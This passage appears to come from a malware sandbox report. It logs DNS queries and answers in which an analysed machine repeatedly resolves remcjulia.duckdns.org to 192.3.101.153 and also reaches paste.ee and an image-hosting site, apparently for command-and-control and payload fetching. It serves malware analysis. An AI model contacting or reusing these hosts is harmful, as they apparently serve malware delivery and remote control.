Apr 24, 2024 10:27:21.590035915 CEST	192.168.2.22	8.8.8.8	0x8f6f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:21.766416073 CEST	192.168.2.22	8.8.8.8	0x8f6f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:22.958211899 CEST	192.168.2.22	8.8.8.8	0x88bc	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:23.131113052 CEST	192.168.2.22	8.8.8.8	0x88bc	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:23.304126978 CEST	192.168.2.22	8.8.8.8	0x88bc	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:23.478357077 CEST	192.168.2.22	8.8.8.8	0x88bc	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:23.650393963 CEST	192.168.2.22	8.8.8.8	0x88bc	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:24.838408947 CEST	192.168.2.22	8.8.8.8	0x39d1	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:25.012598991 CEST	192.168.2.22	8.8.8.8	0x39d1	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:25.185429096 CEST	192.168.2.22	8.8.8.8	0x39d1	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:25.362092972 CEST	192.168.2.22	8.8.8.8	0x39d1	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:25.534986973 CEST	192.168.2.22	8.8.8.8	0x39d1	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:26.745852947 CEST	192.168.2.22	8.8.8.8	0x308e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:26.917037010 CEST	192.168.2.22	8.8.8.8	0x308e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:27.088144064 CEST	192.168.2.22	8.8.8.8	0x308e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:27.258173943 CEST	192.168.2.22	8.8.8.8	0x308e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:27.432531118 CEST	192.168.2.22	8.8.8.8	0x308e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:28.620630980 CEST	192.168.2.22	8.8.8.8	0x6d42	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:28.792924881 CEST	192.168.2.22	8.8.8.8	0x6d42	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:28.963236094 CEST	192.168.2.22	8.8.8.8	0x6d42	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:29.132572889 CEST	192.168.2.22	8.8.8.8	0x6d42	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:29.302155018 CEST	192.168.2.22	8.8.8.8	0x6d42	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:30.610621929 CEST	192.168.2.22	8.8.8.8	0xf54e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:30.784126043 CEST	192.168.2.22	8.8.8.8	0xf54e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:30.964158058 CEST	192.168.2.22	8.8.8.8	0xf54e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:31.134289980 CEST	192.168.2.22	8.8.8.8	0xf54e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:31.305036068 CEST	192.168.2.22	8.8.8.8	0xf54e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:32.490535975 CEST	192.168.2.22	8.8.8.8	0x84b8	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:32.663824081 CEST	192.168.2.22	8.8.8.8	0x84b8	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:32.834944963 CEST	192.168.2.22	8.8.8.8	0x84b8	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:33.005809069 CEST	192.168.2.22	8.8.8.8	0x84b8	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:33.180335999 CEST	192.168.2.22	8.8.8.8	0x84b8	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:34.377790928 CEST	192.168.2.22	8.8.8.8	0x95	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:34.554173946 CEST	192.168.2.22	8.8.8.8	0x95	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:34.727826118 CEST	192.168.2.22	8.8.8.8	0x95	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:34.898413897 CEST	192.168.2.22	8.8.8.8	0x95	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:35.069567919 CEST	192.168.2.22	8.8.8.8	0x95	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:36.250526905 CEST	192.168.2.22	8.8.8.8	0x157a	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:36.420775890 CEST	192.168.2.22	8.8.8.8	0x157a	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:36.591785908 CEST	192.168.2.22	8.8.8.8	0x157a	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:36.765079021 CEST	192.168.2.22	8.8.8.8	0x157a	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:36.935988903 CEST	192.168.2.22	8.8.8.8	0x157a	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:38.121633053 CEST	192.168.2.22	8.8.8.8	0x400f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:38.296170950 CEST	192.168.2.22	8.8.8.8	0x400f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:38.467911959 CEST	192.168.2.22	8.8.8.8	0x400f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:38.638386965 CEST	192.168.2.22	8.8.8.8	0x400f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:38.886128902 CEST	192.168.2.22	8.8.8.8	0x400f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:40.073828936 CEST	192.168.2.22	8.8.8.8	0x4410	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:40.245629072 CEST	192.168.2.22	8.8.8.8	0x4410	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:40.416615963 CEST	192.168.2.22	8.8.8.8	0x4410	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:40.586970091 CEST	192.168.2.22	8.8.8.8	0x4410	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:40.759728909 CEST	192.168.2.22	8.8.8.8	0x4410	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:41.944057941 CEST	192.168.2.22	8.8.8.8	0xbb09	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:42.116087914 CEST	192.168.2.22	8.8.8.8	0xbb09	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:42.286587954 CEST	192.168.2.22	8.8.8.8	0xbb09	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:42.458251953 CEST	192.168.2.22	8.8.8.8	0xbb09	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:42.630963087 CEST	192.168.2.22	8.8.8.8	0xbb09	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:43.819580078 CEST	192.168.2.22	8.8.8.8	0xba33	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:43.994704962 CEST	192.168.2.22	8.8.8.8	0xba33	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:44.168373108 CEST	192.168.2.22	8.8.8.8	0xba33	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:44.340207100 CEST	192.168.2.22	8.8.8.8	0xba33	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:44.514466047 CEST	192.168.2.22	8.8.8.8	0xba33	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:45.729456902 CEST	192.168.2.22	8.8.8.8	0x1c36	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:45.901599884 CEST	192.168.2.22	8.8.8.8	0x1c36	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:46.074964046 CEST	192.168.2.22	8.8.8.8	0x1c36	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:46.266437054 CEST	192.168.2.22	8.8.8.8	0x1c36	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:46.438179016 CEST	192.168.2.22	8.8.8.8	0x1c36	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 10:24:05.592645884 CEST	8.8.8.8	192.168.2.22	0x27d5	No error (0)	paste.ee	104.21.84.67	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:05.592645884 CEST	8.8.8.8	192.168.2.22	0x27d5	No error (0)	paste.ee	172.67.187.200	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:05.791914940 CEST	8.8.8.8	192.168.2.22	0x27d5	No error (0)	paste.ee	104.21.84.67	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:05.791914940 CEST	8.8.8.8	192.168.2.22	0x27d5	No error (0)	paste.ee	172.67.187.200	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:05.966388941 CEST	8.8.8.8	192.168.2.22	0x27d5	No error (0)	paste.ee	104.21.84.67	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:05.966388941 CEST	8.8.8.8	192.168.2.22	0x27d5	No error (0)	paste.ee	172.67.187.200	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:06.136553049 CEST	8.8.8.8	192.168.2.22	0x27d5	No error (0)	paste.ee	104.21.84.67	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:06.136553049 CEST	8.8.8.8	192.168.2.22	0x27d5	No error (0)	paste.ee	172.67.187.200	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:10.023787975 CEST	8.8.8.8	192.168.2.22	0xb3a9	No error (0)	uploaddeimagens.com.br	172.67.215.45	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:10.023787975 CEST	8.8.8.8	192.168.2.22	0xb3a9	No error (0)	uploaddeimagens.com.br	104.21.45.138	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:20.959872007 CEST	8.8.8.8	192.168.2.22	0xd646	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:43.332046986 CEST	8.8.8.8	192.168.2.22	0x4e41	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:05.718367100 CEST	8.8.8.8	192.168.2.22	0x803b	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:30.051095963 CEST	8.8.8.8	192.168.2.22	0x730	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:56.186532974 CEST	8.8.8.8	192.168.2.22	0x9e7c	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:56.430120945 CEST	8.8.8.8	192.168.2.22	0x9e7c	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:56.608642101 CEST	8.8.8.8	192.168.2.22	0x9e7c	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:56.779314041 CEST	8.8.8.8	192.168.2.22	0x9e7c	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:56.961359024 CEST	8.8.8.8	192.168.2.22	0x9e7c	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:58.228331089 CEST	8.8.8.8	192.168.2.22	0xbbf7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:58.397811890 CEST	8.8.8.8	192.168.2.22	0xbbf7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:58.641875029 CEST	8.8.8.8	192.168.2.22	0xbbf7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:58.815279007 CEST	8.8.8.8	192.168.2.22	0xbbf7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:58.989108086 CEST	8.8.8.8	192.168.2.22	0xbbf7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:00.168962955 CEST	8.8.8.8	192.168.2.22	0x1275	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:00.340002060 CEST	8.8.8.8	192.168.2.22	0x1275	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:00.513348103 CEST	8.8.8.8	192.168.2.22	0x1275	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:00.683156967 CEST	8.8.8.8	192.168.2.22	0x1275	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:00.855165958 CEST	8.8.8.8	192.168.2.22	0x1275	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:02.187155008 CEST	8.8.8.8	192.168.2.22	0x35c1	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:02.358052015 CEST	8.8.8.8	192.168.2.22	0x35c1	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:02.528703928 CEST	8.8.8.8	192.168.2.22	0x35c1	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:02.702465057 CEST	8.8.8.8	192.168.2.22	0x35c1	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:02.874758005 CEST	8.8.8.8	192.168.2.22	0x35c1	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:04.053447962 CEST	8.8.8.8	192.168.2.22	0x25be	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:04.223450899 CEST	8.8.8.8	192.168.2.22	0x25be	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:04.395903111 CEST	8.8.8.8	192.168.2.22	0x25be	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:04.566926003 CEST	8.8.8.8	192.168.2.22	0x25be	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:04.739326000 CEST	8.8.8.8	192.168.2.22	0x25be	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:05.925120115 CEST	8.8.8.8	192.168.2.22	0xb5f4	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:06.095607042 CEST	8.8.8.8	192.168.2.22	0xb5f4	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:06.265571117 CEST	8.8.8.8	192.168.2.22	0xb5f4	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:06.438157082 CEST	8.8.8.8	192.168.2.22	0xb5f4	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:06.610205889 CEST	8.8.8.8	192.168.2.22	0xb5f4	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:07.880388021 CEST	8.8.8.8	192.168.2.22	0xd538	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:08.056811094 CEST	8.8.8.8	192.168.2.22	0xd538	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:08.227189064 CEST	8.8.8.8	192.168.2.22	0xd538	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:08.396945953 CEST	8.8.8.8	192.168.2.22	0xd538	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:08.569644928 CEST	8.8.8.8	192.168.2.22	0xd538	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:09.760201931 CEST	8.8.8.8	192.168.2.22	0xad5a	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:09.931088924 CEST	8.8.8.8	192.168.2.22	0xad5a	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:10.112226009 CEST	8.8.8.8	192.168.2.22	0xad5a	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:10.287075996 CEST	8.8.8.8	192.168.2.22	0xad5a	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:10.471915007 CEST	8.8.8.8	192.168.2.22	0xad5a	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:11.686131954 CEST	8.8.8.8	192.168.2.22	0x476f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:11.859334946 CEST	8.8.8.8	192.168.2.22	0x476f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:12.030911922 CEST	8.8.8.8	192.168.2.22	0x476f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:12.203296900 CEST	8.8.8.8	192.168.2.22	0x476f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:12.374563932 CEST	8.8.8.8	192.168.2.22	0x476f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:13.563388109 CEST	8.8.8.8	192.168.2.22	0x6047	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:13.733494043 CEST	8.8.8.8	192.168.2.22	0x6047	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:13.905585051 CEST	8.8.8.8	192.168.2.22	0x6047	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:14.076750994 CEST	8.8.8.8	192.168.2.22	0x6047	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:14.247693062 CEST	8.8.8.8	192.168.2.22	0x6047	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:15.437956095 CEST	8.8.8.8	192.168.2.22	0x5211	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:15.611864090 CEST	8.8.8.8	192.168.2.22	0x5211	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:15.781730890 CEST	8.8.8.8	192.168.2.22	0x5211	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:15.953032970 CEST	8.8.8.8	192.168.2.22	0x5211	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:16.126195908 CEST	8.8.8.8	192.168.2.22	0x5211	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:17.312261105 CEST	8.8.8.8	192.168.2.22	0x9861	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:17.483273029 CEST	8.8.8.8	192.168.2.22	0x9861	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:17.655482054 CEST	8.8.8.8	192.168.2.22	0x9861	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:17.827130079 CEST	8.8.8.8	192.168.2.22	0x9861	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:17.998078108 CEST	8.8.8.8	192.168.2.22	0x9861	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:19.262922049 CEST	8.8.8.8	192.168.2.22	0x2496	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:19.433044910 CEST	8.8.8.8	192.168.2.22	0x2496	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:19.603964090 CEST	8.8.8.8	192.168.2.22	0x2496	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:19.777791023 CEST	8.8.8.8	192.168.2.22	0x2496	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:19.947706938 CEST	8.8.8.8	192.168.2.22	0x2496	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:21.137733936 CEST	8.8.8.8	192.168.2.22	0xb79d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:21.307137966 CEST	8.8.8.8	192.168.2.22	0xb79d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:21.478547096 CEST	8.8.8.8	192.168.2.22	0xb79d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:21.649339914 CEST	8.8.8.8	192.168.2.22	0xb79d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:21.820276022 CEST	8.8.8.8	192.168.2.22	0xb79d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:23.007540941 CEST	8.8.8.8	192.168.2.22	0x12b7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:23.177845955 CEST	8.8.8.8	192.168.2.22	0x12b7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:23.349260092 CEST	8.8.8.8	192.168.2.22	0x12b7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:23.522248983 CEST	8.8.8.8	192.168.2.22	0x12b7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:23.696813107 CEST	8.8.8.8	192.168.2.22	0x12b7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:24.899585009 CEST	8.8.8.8	192.168.2.22	0x4e6d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:25.071985960 CEST	8.8.8.8	192.168.2.22	0x4e6d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:25.243480921 CEST	8.8.8.8	192.168.2.22	0x4e6d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:25.417495012 CEST	8.8.8.8	192.168.2.22	0x4e6d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:25.589740038 CEST	8.8.8.8	192.168.2.22	0x4e6d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:26.789223909 CEST	8.8.8.8	192.168.2.22	0x758b	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:26.960005999 CEST	8.8.8.8	192.168.2.22	0x758b	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:27.131520987 CEST	8.8.8.8	192.168.2.22	0x758b	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:27.308566093 CEST	8.8.8.8	192.168.2.22	0x758b	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:27.481079102 CEST	8.8.8.8	192.168.2.22	0x758b	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:28.669480085 CEST	8.8.8.8	192.168.2.22	0x274d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:28.839267969 CEST	8.8.8.8	192.168.2.22	0x274d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:29.013062954 CEST	8.8.8.8	192.168.2.22	0x274d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
